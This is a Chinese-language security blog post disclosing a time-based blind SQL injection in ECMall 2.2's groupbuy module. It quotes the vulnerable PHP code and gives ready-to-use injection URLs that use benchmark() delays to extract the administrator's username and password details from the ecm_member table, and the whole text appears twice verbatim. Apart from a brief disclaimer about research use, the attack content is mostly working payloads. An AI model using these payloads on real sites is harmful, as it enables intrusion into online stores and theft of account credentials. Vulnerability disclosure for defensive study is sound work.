上一篇
下一篇
ECMall 2.2 app/groupbuy.app.php 延迟注射漏洞
作者:admin 日期:2010-07-24
代码分析
ECMall 社区电子商务系统(简称ECMall)是上海商派网络科技有限公司继ECShop 之后推出的又一个电子商务姊妹产品app\groupbuy.app.php:26:function index(){$id = empty($_GET[''id'']) ? 0 : $_GET[''id'']; //id未过滤if (!$id){$this->show_warning(‘no_such_groupbuy’);return false;}// 团购信息$group = $this->_groupbuy_mod->get(array(‘conditions’ => ‘group_id=’ . $id . ‘ AND gb.state<>’ . GROUP_PENDING, //好的,进去了!!‘join’ => ‘belong_store’,‘fields’ => ‘gb.*,s.owner_name’));if (empty($group)) //很多时候根本没有团购信息,所以是延迟注射了{$this->show_warning(‘no_such_groupbuy’);return;}
测试方法
【sitedir.com.cn】
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!/index.php?app=groupbuy&act=index&id=2 and if((select ascii(mid(user_name,1,1)) from ecm_member where user_id=1)=97,Benchmark(3000000,md5(1)),1)%23/index.php?app=groupbuy&act=index&id=2%20and%20if((select%20length(password)%20from%20ecm_member%20where%20user_id=1)=32,benchmark(1000000,md5(1)),1)–
ECMall 社区电子商务系统(简称ECMall)是上海商派网络科技有限公司继ECShop 之后推出的又一个电子商务姊妹产品app\groupbuy.app.php:26:function index(){$id = empty($_GET[''id'']) ? 0 : $_GET[''id'']; //id未过滤if (!$id){$this->show_warning(‘no_such_groupbuy’);return false;}// 团购信息$group = $this->_groupbuy_mod->get(array(‘conditions’ => ‘group_id=’ . $id . ‘ AND gb.state<>’ . GROUP_PENDING, //好的,进去了!!‘join’ => ‘belong_store’,‘fields’ => ‘gb.*,s.owner_name’));if (empty($group)) //很多时候根本没有团购信息,所以是延迟注射了{$this->show_warning(‘no_such_groupbuy’);return;}
测试方法
【sitedir.com.cn】
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!/index.php?app=groupbuy&act=index&id=2 and if((select ascii(mid(user_name,1,1)) from ecm_member where user_id=1)=97,Benchmark(3000000,md5(1)),1)%23/index.php?app=groupbuy&act=index&id=2%20and%20if((select%20length(password)%20from%20ecm_member%20where%20user_id=1)=32,benchmark(1000000,md5(1)),1)–
文章来自: 
引用通告: 
Tags: 评论: 0 | 引用: 0 | 查看次数: 25
发表评论
